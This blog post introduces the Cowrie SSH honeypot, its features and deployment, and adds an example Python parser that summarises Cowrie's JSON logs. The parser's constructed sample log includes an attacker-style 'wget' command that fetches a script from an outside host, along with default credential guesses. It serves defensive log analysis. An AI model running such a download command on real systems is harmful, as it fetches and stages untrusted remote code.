
Cowrie – An SSH Honeypot (A Quick Glimpse)

Cowrie – written by Michel Oosterhof – is a medium-interaction SSH honeypot designed to log brute-force attacks and the shell interactions performed by attackers. (Sounds familiar? Yes, it is a fork of Kippo.)

The motivation of this blog post is to provide a quick glimpse at Cowrie – a brief experience of what it’s like to handle Cowrie, what the deployment process is like, etc.

Everything you need is in the GitHub repo

Michel did a very good job explaining what Cowrie is all about, how to set it up, etc. – it is all pretty much self-contained in the GitHub repo (https://github.com/micheloosterhof/cowrie).

Very similar to Kippo

If you’re already familiar with Kippo, you’ll be very comfortable with Cowrie. It also has many additional features on top of Kippo which I’ve yet to play with:

  • SFTP and SCP support for file upload;

  • Support for SSH exec command;

  • Logging of direct-TCP connection attempts (SSH proxying);

  • Logging in JSON format for easy processing in log management solutions; and

  • Many, many additional commands.
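The JSON logging mentioned above is the feature that makes a honeypot useful to a defender: each event is one JSON object per line, so it can be parsed without regular expressions. The following is an added example, not code from Cowrie or from this post; it parses a handful of constructed log lines in the shape of Cowrie's JSON output (the `eventid`, `src_ip`, `username`, `shasum` field names are assumed to match Cowrie's, the addresses, credentials, session ids and hash are made up) and reports which source addresses crossed a brute-force threshold, which sessions logged in, what they typed, and what they downloaded. A malformed line is included to show that one corrupt line should not abort processing of the rest.

```python
import json
from collections import Counter, defaultdict

# Constructed sample log: one JSON object per line, in the shape of Cowrie's
# JSON output. Field names are assumed to match Cowrie's; every value below
# (addresses, credentials, session ids, URL, hash) is made up for this example.
SAMPLE_LOG = """\
{"eventid": "cowrie.session.connect", "src_ip": "198.51.100.7", "src_port": 51022, "dst_port": 2222, "session": "a1b2c3d4", "timestamp": "2017-03-01T10:00:00.000000Z"}
{"eventid": "cowrie.login.failed", "username": "root", "password": "123456", "src_ip": "198.51.100.7", "session": "a1b2c3d4", "timestamp": "2017-03-01T10:00:01.000000Z"}
{"eventid": "cowrie.login.failed", "username": "root", "password": "password", "src_ip": "198.51.100.7", "session": "a1b2c3d4", "timestamp": "2017-03-01T10:00:02.000000Z"}
{"eventid": "cowrie.login.failed", "username": "admin", "password": "admin", "src_ip": "198.51.100.7", "session": "a1b2c3d4", "timestamp": "2017-03-01T10:00:03.000000Z"}
{"eventid": "cowrie.login.success", "username": "root", "password": "toor", "src_ip": "198.51.100.7", "session": "a1b2c3d4", "timestamp": "2017-03-01T10:00:04.000000Z"}
{"eventid": "cowrie.command.input", "input": "wget http://203.0.113.9/x.sh", "src_ip": "198.51.100.7", "session": "a1b2c3d4", "timestamp": "2017-03-01T10:00:05.000000Z"}
{"eventid": "cowrie.session.file_download", "url": "http://203.0.113.9/x.sh", "shasum": "PLACEHOLDER_SHA256", "src_ip": "198.51.100.7", "session": "a1b2c3d4", "timestamp": "2017-03-01T10:00:06.000000Z"}
this line is not JSON and must be skipped, not crash the parser
{"eventid": "cowrie.login.failed", "username": "pi", "password": "raspberry", "src_ip": "192.0.2.33", "session": "e5f6a7b8", "timestamp": "2017-03-01T10:01:00.000000Z"}
"""


def parse_cowrie_log(text):
    """Return a list of event dicts, one per well-formed JSON line.

    Blank lines and lines that are not a JSON object with an "eventid" are
    skipped: a single corrupt line must not abort processing of the file.
    """
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            evt = json.loads(line)
        except json.JSONDecodeError:
            continue
        if isinstance(evt, dict) and "eventid" in evt:
            events.append(evt)
    return events


def summarize(events, failed_threshold=3):
    """Aggregate parsed events into a small incident summary.

    failed_threshold: number of failed logins from one src_ip at or above
    which that address is reported as brute-forcing (a constructed value).
    """
    failed = Counter()               # failed logins per source address
    succeeded = defaultdict(list)    # usernames that got in, per source address
    commands = defaultdict(list)     # shell input per session id
    downloads = []                   # files fetched into the fake filesystem

    for evt in events:
        eid = evt.get("eventid")
        ip = evt.get("src_ip", "unknown")
        if eid == "cowrie.login.failed":
            failed[ip] += 1
        elif eid == "cowrie.login.success":
            succeeded[ip].append(evt.get("username"))
        elif eid == "cowrie.command.input":
            commands[evt.get("session")].append(evt.get("input"))
        elif eid == "cowrie.session.file_download":
            downloads.append({"src_ip": ip, "url": evt.get("url"),
                              "shasum": evt.get("shasum")})

    brute_force = sorted(ip for ip, n in failed.items() if n >= failed_threshold)
    return {
        "failed_logins": dict(failed),
        "brute_force_sources": brute_force,
        "successful_logins": dict(succeeded),
        "commands": dict(commands),
        "downloads": downloads,
    }


if __name__ == "__main__":
    summary = summarize(parse_cowrie_log(SAMPLE_LOG))
    print(json.dumps(summary, indent=2))
```

The same two functions work unchanged on a real Cowrie JSON log read from disk, and the `shasum` field of each download is the value you would hand to a sandbox or a hash lookup; keep the threshold low for a honeypot, since no legitimate user should ever be failing logins against it.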

Is it secure?

Michel directed this question to the FAQ of Kippo: https://github.com/desaster/kippo/wiki/FAQ.

“Kippo is written in Python, and doesn’t call any external software, so it’s probably somewhat secure. Kippo has not had any real security audit done on it, and it’s definitely vulnerable to some DoS attacks (no limits on how many people can connect to it, or how many files they can download). It’s recommended to run Kippo in a well firewalled virtual machine.”

Conclusion

This is a really quick glimpse at Cowrie. It’s very easy to set up, and it looks very promising.


My Setup

Some Screenshots

Screenshot: Running Cowrie on port 2222. ifconfig reflects the correct IP address.

Screenshot: curl

Screenshot: Attackers' wget items remain in the fake filesystem

Author

Emil Tan, Chapter Lead, The Honeynet Project, Singapore Chapter


Division Zero (Div0) © 2017-2020.

Edgis © 2011-2017.